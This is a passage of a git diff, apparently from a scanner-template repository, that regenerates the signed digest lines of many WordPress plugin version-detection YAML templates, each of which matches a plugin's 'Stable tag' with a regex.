490a0046304402207972c8ddc1644b9f16bc70c377a3b55583d56c4ed8bd979b45cf56b9fa9d8e280220795eefbad9b2418e5b99a92e7932e449f10efe9f087990a1cecbe7ba991b68eb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ad5586dbb78f00fc87250c6a450dc32bfbc0e29095e77da911592054a8375975022044fe60629d9c95fce9c0c1bafe0682d3a7180c021a4df1f79dc06db34fd2f4c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index b482cd882e..6338060475 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220252dd3483e61a094c11173b20ae7bc9f8fc9ffd1ce05da27ea890f87429d9016022100e16a699ea535c800ac7ab4864b09632328a1ef44f5a158989124059132625083:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d40bcfa047a8dc389714d70d6dcb8c5ba61db70d47fe689c233c2555bf8c6c4c02207fcc9c506e46764192405f8d0b68669554c70fef32ba3e1ef84e637ef3a3313d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 869612262e..79976cfcb5 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202c0fe31e68c4d544d3a88cb236d8151a509df4e5b374042f0c12e13fae6ae115022100bfee02613be8bd7ff8b2711a8b417108b318849f6a5fc0340bf13bb0459c9656:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008c3ed5dfcae768d0c59e289d4b6e66345d3c0764b6e82084d7fc8d630470570102210095aaea470078a6a9d9fde3dc63133a73154ecdbddb84c1b96937f7befb2482f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 4bfb8730f8..efd1426d03 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a31b60eb96d14c10b3b44cfecb55daf5d59b4147bc38c349cba90359726a63b902202e793cb717311b3eee336c7a486e0c3ee1b583758b2fde6bb5a23be09e3314b4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bcfcc474a11e33454efa38062bc29f1a273adb4346b82a94545dd59826f46e0a022100ccfcc33c6276d44e7bc4f41146e12773f24cd659ab8ca3980f7aaab7cc5f9b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 694281fb2f..b987cb4ccf 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220070fa26248b89ee6d865f6199747a2db243ba9d686eae698f3127f8640f19c030220313a14034ceb0871fac0c3ea94b0bc58155158b29d4c854d3c36d26e98b407ec:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eb72ff33e881abe9b1b774733f2db7f020edff834bacb9fc4bedb9f66e6ca27a022100ec0d5645c6ec992a30edf9fe7e6c225586295844f326c4b4ea0982126eb6b444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index a6e62aba64..322fc8d9a4 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c2d1574b3b991265375f4cfaa5b3aeb33eb8886fa0b5785d80990016b0259e52022100935a30611562ace82e24373d41abb181cdc46accfc76eb690aeb232a8865197b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206a13bb4512905b1afb3c9b0f09a6515ddce6100a67b16047837148962d3a149c022100acc781e3c8b380c4447a2622412a461981e95c67ab875bbe0f9e24e8d3526b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 876051899e..322e9f34a1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207bd7561508ec5dd8e7af0c32b0bb5982d0f05c21165e3c42cfeccd33fff1df8a022063dd1c3dbeee75ec7ea71c6bb1b22fa17a881b110e3bec33631ddbf9ea7bf2a6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e8a6cca761b6856c3fdd76365042d7766b0594929a108fae3ba6dfd0eedf2701022100a567d531b5ba55e14df713b14886e0e6e2ec16ac5e49d1fff74ca99908221a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index ac4c41fbff..bd4525b45f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d3a3c4f4ca39eaa531ed952e3288af1cd0a48580fc66b5b148fcd29da0a46ce902210096a94f1c35896be670b5a1017aa1e26f7348983f9ec585805f54fd1a50bb6c6b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bd3819c562205fc5744d3a2b4e1b374e12c71f02108a7044af160afdc3110fb802201c2ede28e78880926b76ce34f5cd5226eaca93e5e29367f23a4309edd69063f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index bed1bf7236..032579ec6b 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220641bd0a6a956252dee349efca88a03a3a302a887e1c989c069963cf02e56541b022048785c23915123065d91a303744fde092e7ca15ba209fb7a366d81375b4c624c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206e9c0c291d6cc194331367fd6c63768c8c841b767d082d3ee3ef7a3adf5717a202205b0a920aa38becaff0af193f240b9011d0cf4c85112e1a6788ffc873d0a37729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 3dbb49a52c..382fd8839b 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022051f7fa02a65e11935f9b0bb86f2691eae09a286755698df122228ebb0458d9ec022100aa040409d42c0e3510a4478e83ed849f43bcffb41aac4a8da9423067a68078fd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022047778e10c672a57e89966ff1d1fca7726afdbcfa7a44c0b89f6d7064fbb7af5a02205bf945c94d59b6beffe69f5016f30a3903c6b8e4b3c080e3f21e265fa299a887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 14145ebf6f..04d04570d6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202637e152b2b8ff0fdab13696aeac93e9a384f4184651f2b9ecaf9c075366cd4902203944b0c5009f24d18bf472f7856eb506d2f10961bf7ba65bbedde5751d36f10a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e5720af92f8c2abdd01962fdf05cf272e3f0c0fb6313eb581b70c96353feb2cd02207c2c1888141bc835f0bfd5f12f3dbe762b51267c996ccda783c05e8b2ec02d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 9c8f5ddd5f..364757f53c 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b0c2d7207877794b01e622e2b1c53e79ca2e69f27e96a8cf996d219ca34f54e3022100d96a997255400b928da5ca29d83345e06596732aa3e56d4572dd689ea8b01267:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207abfb4686c7c3365443d602b304400c4eb933ffe3f38488f8aec2ad8b793eef202201017be7c93593890234b252cc7d7f19ff600f69decb639125484bb8b78e9a0e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 73826228d7..e7a80ead4d 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fe3a81b983858e6aa75f53d82b8262b6a1ca56347315d442eb72327e93fc5c0002203e27bb56065acd1738b4b7b60f5947128c55183dfed9cd3ba75c0dc4f4264a34:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022072985bf139c1a72b59f7941f7fae52938b528aff6479940c722095b2240b45d102210085c04b04b0f166ed7207ab989300a6067d374d810aab793da59512f26ab3415b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 683b4a253c..b81610371d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202aa116910d72b6e918a833982ced9683b45b8d198019a69d1155873cabbcf6bf02203ada66e11d9884855d32d4c5048574c3df74de9cf1961024a801647886728c9e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022049e3cb4353ce33f287a7f53c667ecf70e3b1ec32c59e42bf1bb06b6e9241eb1502200f9872b8218799591bc8736ce2a98b1d530a4b84955c50cd175907a8335df1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 0a4b9aee09..3988ceb31b 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022064436014aab6534f603d4f2982960dfd9458fc75d158562af8984d2984b0416902202b364c30b74645c4783c077abd0fea3439436ef8b5320b1d313ffd30fd3f1915:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210098130be8153175f107e1397fdd9f6a37c5be33aa6fb8561118858a772819bb63022100fa723ba97c9419383f8c79bfebd2ca15993b66c40407f307fda13e5d8792ed22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 8c4bc5dfa6..311b61b6e5 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220441e97d329af65d77e6c4d26098d0bb5bf1d6e8be59c1a5265e3bdd2c130be8d022100a0cea0a469a4265d6f183df1e2dfd56d3266fa19916ba87df6d4fa658d0134e3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220017fb4d9377d1e79bedf21b38ff489b7ac18d419e0c81251ce9943514066508f022100cf23d4f4e098632b8f1b3765b7f853647d8428b2548641fde97bb0379e3e48e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index f43338ddad..4def193815 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202e5caa2c52549e67f3b724b7dd8c30060262eaee02d6a640dbb19e84fa365cf5022100924bf7bdddb9b01ad3a2d8c18d1bc003b7b8cc78a9977c066c686ef31a16b82a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003ff466168f4b0e53217f2b54185a2deecde1259661587eecca3701b36bae9d20221009777b54248eeee45b81d37fe1190810453bd54d7f13f4ded6fc39ad659147476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 630077b567..96d844d271 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201c316891170440b15dc8551f5b9c8551bdb8bf77335de08e997da139d83eea36022100fdcd10f49845983d12ed473a8e410461b475afb5c1a16c978ff7ee67415374b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a444c75dd9a107c085c8ff248baa38305ae22eba3c61157dbc85dacc2ef084b6022100bbd0e535714b16f17acc82c8a5bf196d76a77e22ab2fcaf4ddd4b9cc29ecea15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 6b352cc1ce..88eca65b42 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f907641cd0461feb52c159826fa1dfbf873adbfd7210a5296e0b46b8cbe9192302210086c7050d4bad546a2d35098dab99bc2a99585fa3158f57b45ddfbbfff6a4f7a4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d562bfe51c026c90a696c1399fc0dea180436f6a08594da47bcc7450b5bcef13022100f7c80e80b9f4a6b6ce3ddb3ace8c935edb4ddf7bee277d0e28c9f27f1b2b899a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index dbf69f2fec..bff64b2368 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022021907641e29c4b58dba730009af7a0415cf05895b5e3ea9b92eff6dd53f583aa022100818fed95ba1d30c30fc975e827ceac1bbf24f094f63f2e2fa4386bb8ee5e67d8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fca006140a5497f25c20f54e49d7645970e2bfa0a5175499e07e6f00987e0b60220687ef3c9b1a69153c86b16124c115c3947ec44dccdad2a5db62c751fd587cedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index cc172e7b64..dd8b7dcb52 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207737df68b8389ab2440d213b7f660e121b5c2616b33ff99ed23cb30fea75814a02200526231d44aed8820afb7a7e90a80a51164883a50dbf13ff8b2e6304b84279b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204346747c29e3ccae02e18b06824e32d58e20eb6f363046ac8bd8f14b1d677478022100e1a0c4eb493da1a453e2ef308318fab076ef0e5bc4df0e7325d59ff64014e34e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c3f7975d0b..5d0f50172e 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206e5a5c686c32f99f67dda5e48113f6669c49f1409a9c7cda64f6bc287d60b164022100e6c74fd22a394a86bd6888483fdcbfa4b11da6ca6605c58b8a9d0d65d6ebaede:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc3fd062d3730e892341db77052dff2edcd3023965bb9e6b04c7c9f6e10f2b770220348b23d39d03518d1c06d0f6d39cccb2bffa796bbccad2bb82656edd2720b49d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index fd5f9577c5..2e4951f00b 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207ed8a7e17350d4a2b0ea4576ff3ace2628820e4f6513bab5fdd5e18f0b5e80e4022047f6a7d2e3f8c26d4a7545a5466a5950ef1f934b5a510c8374efe7a7f1be58e9:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001c0b4c8c829cf3d7defdd267e38fb0c4275c9da0ff2dc1b5d1ec9f3bb2ed42a02205e516743a84a15d29a9d9f62373fbbd74affe78bb1b444a70e3efdb33925d9d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 274cba2de7..b4f993bdfb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008c4d3188cbe214f34a545f54d3f57e072c84dba6e11c284335e1a65f99c69f2e022100fd9cf7dde044727201adbd976a09ca4e020b6d27ba8c6cf35b55c41e71c41d34:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207fdc12e1f68d13fa7d414a8ce3158f4603dcf0bcb8b58d41b8a32af82bb0728f022100c11947d7f1af1c540378fadaa86394326d6a972c8f0a731a85eb15f7b6992931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 23fe82ad4e..610a293621 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202a4a3acb94e8c21f694cf652050fe7a5f183e0a4c18e33ff83a40c959f4452c8022100ef7a9ca8e6b8effc57f7391491aca5f031f02a199f38a4be8d8d9cfbb4b6c7f3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210082383f13f2a434d779574affbe831640c8892a4ae14d6a9974d091a0e3157dd2022100e23a53f0dfa6d77a4c8dd4b26f698e27e90c130a18352c6e6958545f93a45784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 48277900db..0631742a5b 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008b2446e445301786e8cda5e1b7b4fac86dacb0e5d0b8669602940397be330ee102210089883aa16490d28b00ae5d8c6c65ece84f8fb63f0194cc2016a3e134f1441e10:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210088986561a8b05f19ebe460be2d08665de9fa287443fdcbe903631727b27ee86a022076914d479b7bcc01279aef5aa3ef3268d0b6f5372b969f887202854928267ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ed6bcd4809..9c9ece5540 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220095084ead6d97ac003168787cccb95b651778889c027ce72564266a511ffe77f022070e6e4702302ee3c2cda447ade8745923adbde12e5cbb1fdd15f7721d9d1a173:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008f2a9a73cb2fb670189786a72589602f033e8ce4aafa8935ea1d6fd64ab057ff02200930f7705525c5e23dfb8deeda73f8f804065d3f6d5b7cb0785a44db4937b7c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index f0c518963a..d1a463eb11 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b33d2a06bd672c3d9695d1452d856a695e356a6e9835a145f3e40582a13f50d02207817ed22c8da6c4287d75c58eaeefdb9002aba940e38a46984d9ddee4e5260a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009684969eaedf6379b653f288f14d5f6d1950d7f1e5d8b8b9e9e9263cf1b14a3702205110f1aa7db1ebe672ba71f9e05b33a3a40f370323a4506c2b033de7e08a1134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 263506ebdb..5dea0bef30 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f81dcbbff92f29994faf8d91a54fde1061414a8ffe7f48c32c7629307a6f074902205e0520e47225d9ba436e1192517adad1942ee81a9e7c4c18d604c954212c8b52:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022060e616c8045fc6cc923487cb326f79d5186fa199262410164d66126d4b892d450220531b1c41a106123ae8e84c432fe5da795e384a68d09df8bad1130e64a6296107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 0e329244ac..6f298bc0b8 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022024b77a544921bff84dcb7d0015dc75b6292abdc16e8a9a15858928496b870b74022100849d5b51c48be8106e09ef5c91c21a2752080b37c822226c5c6eec95293d3497:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202cf5f03217a08e1650621fa0e3bc44fe3d3b62ddd5b25ce29d69e29ce39ab63602200791a39319b2a9d886bcd41a50e987631d6622d7e87b6c8fc7fd2d092c7ad964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 40f089a1b8..204b7a3f75 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202746786a013c54d196cdb9ed47e5d594febdc29514ba9d7cdbd837c1206d506b022053be488b317e0237d9947626975445f2197fd9a0403cebb6a15941474c9187d7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204e510c1edc86cb7f7a8fe68bda7b86b5e3725f60822501c43fbab7cd281e8663022050005b046240c81cac0a93c411d9cfd4f8a4f30035648eca82b1b23fc7ebb196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 4d3c1dc855..1bfe786ead 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200562999ebbd37bf2d3619f7bc59a697d27c494f3207e836cafbbeb3b13702715022100f5517e7e7cf8ec77a5080d492b32b69a69ccc36f6b0aa8b8abd397de963a8e38:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100886fde48d751cd620c3c135e5c53505b7b629c838ed1821a3b7b1adb443e8278022100d31986677b41e090c9096af646e2b94ffded6e9d87be63f0b3938514b9a7134a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index b03d5962ec..888e44f7de 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022011630669de08df30cf328b39eb2b4bd36ba31244d195d116cebc5d04c74e15f60221008a10d1c901ba5bcd7404302648412bb75ce622954643cbdfc6cc482ea7299544:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210085e8127a8cbf3869369e4d9d10dbe5cd341ba8a8f1d2ee691b20cc3727d15bb5022100bdd795ccaf52d5ebdceda7979f502a5caf9466c9eccd6e9829ad2fa7eca8f5fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index a8d9525e87..019ebf863f 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aeddcac97ba4b65efff620b6045e8642f33203d7c0a95bbf85f68e241c35aaca022100b9aa03a9d7a4b0c05f6fda40ac033c6f2054ac781fb280d1826c7f38ec0f5e0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b6a48dacb4e0040258345ea21c5d8772e9f4af529426d87aec2e20464ef60db60220226d47d2ffd153d746eb5f513f6cef67a8e6c31b0ab4a4f27e1ea8e04729ec53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 987a903d8e..0dbbe02cf0 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b0c29fbde561425303b60e0d97745d0c24b300f60f58b8177f344fe86bd5e46c022022de9125af09e219bc4bbd706c69984cb2d2ded8bc87ea449ecc2863f4c7ab03:922c64590222798bb761d5b6d8e72950 +# 